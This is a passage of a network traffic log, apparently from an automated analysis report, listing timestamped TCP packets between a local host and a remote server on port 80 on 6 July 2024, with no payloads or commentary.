                                                              Jul 6, 2024 04:22:02.079129934 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079134941 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.079142094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079164028 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.079176903 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.079554081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079565048 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079575062 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079583883 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079593897 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079601049 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.079605103 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079617977 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079626083 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.079629898 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079641104 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.079646111 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.079663992 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.079677105 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.099942923 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.106945038 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346249104 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346266031 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346276045 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346299887 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.346316099 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.346318007 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346328974 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346338987 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346354008 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.346380949 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.346409082 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346420050 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346446037 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.346496105 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346513987 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346534014 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.346559048 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.346571922 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346582890 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346596003 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346610069 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.346618891 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.346635103 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.346846104 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346857071 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346865892 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346875906 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346887112 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346889973 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.346898079 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346904993 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.346911907 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.346934080 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.346946001 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.347132921 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347143888 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347188950 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.347286940 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347296953 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347306967 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347316027 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347326994 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347332001 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.347343922 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347356081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347358942 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.347367048 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347378016 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347385883 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.347389936 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347413063 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.347435951 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.347773075 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347784996 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347795010 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347805023 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347815990 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347829103 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.347831011 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347843885 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.347856045 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.347868919 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.347896099 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.348083019 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348093987 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348103046 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348113060 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348123074 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348134041 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348135948 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.348145008 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348155022 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348155022 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.348175049 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.348189116 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.348198891 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348210096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348217010 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348231077 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348237991 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.348242044 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348253965 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348263025 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.348264933 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348275900 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348287106 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348292112 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.348299026 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.348315001 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.348328114 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.348352909 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.349060059 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349076986 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349087000 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349096060 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349107981 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349107981 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.349116087 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.349119902 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349132061 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349143028 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349147081 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.349154949 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349157095 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.349165916 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349179029 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349186897 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.349189997 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349201918 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349205017 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.349212885 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349225998 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349231958 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.349236012 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349251986 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349261045 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.349271059 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.349276066 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.349299908 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.349313974 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.350044012 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350054979 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350064993 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350075006 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350085974 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350095987 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350096941 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.350107908 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350120068 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350122929 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.350131035 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350135088 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.350142002 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350152016 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350163937 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350164890 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.350173950 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350183964 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.350186110 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350197077 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350198984 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.350209951 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350220919 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350224972 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.350231886 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350243092 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350250006 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.350253105 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350264072 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.350272894 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.350292921 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.351006985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351017952 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351039886 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351053953 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351058006 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.351063967 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351077080 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351083994 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.351087093 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351099014 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351110935 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351118088 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.351123095 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351134062 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351144075 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351147890 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.351155043 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351162910 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.351166964 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351177931 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351182938 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.351188898 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351201057 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351205111 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.351212978 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351224899 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351231098 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.351237059 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.351243973 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.351255894 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.351284027 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.437040091 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437051058 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437057972 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437205076 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437206984 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.437216043 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437227011 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437239885 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437268019 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.437299013 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.437448978 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437459946 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437469959 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437480927 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437494993 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437503099 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.437506914 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437519073 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437530041 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437541008 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437555075 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.437591076 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.437766075 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437786102 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.437824011 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.437866926 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.438071966 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438081980 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438091040 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438101053 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438110113 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438121080 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438127041 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.438132048 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438143015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438153028 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438163042 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438174009 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.438174009 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438185930 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438196898 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438205957 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438210964 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438215971 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.438222885 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438231945 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438258886 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.438290119 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.438915014 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438925028 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438934088 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438944101 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438955069 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438963890 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438963890 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.438975096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438985109 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.438991070 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.438994884 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439009905 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439011097 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.439021111 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439029932 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.439032078 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439043999 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439049959 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.439054966 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439066887 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439069033 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.439078093 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439089060 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439094067 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.439097881 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439109087 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439114094 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439121962 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.439135075 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.439166069 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.439802885 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439824104 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439835072 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439845085 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439847946 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.439856052 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439866066 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439872980 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.439877033 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439887047 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439898014 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439898014 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.439908981 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439913988 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.439923048 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439934015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439941883 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.439945936 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439956903 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439968109 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439969063 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.439977884 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.439979076 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.439990997 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440001011 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440010071 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.440013885 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440032959 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.440045118 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.440747976 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440759897 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440768957 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440778971 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440788984 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440798044 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.440798044 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440809011 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440823078 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440829039 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.440834045 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440839052 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.440845966 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440856934 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440862894 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.440866947 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440876961 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.440879107 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440890074 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440901995 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440908909 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.440913916 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440923929 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440933943 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440942049 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.440946102 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.440953970 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.440983057 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:02.441638947 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:02.441649914 CEST804973095.169.205.186192.168.2.4
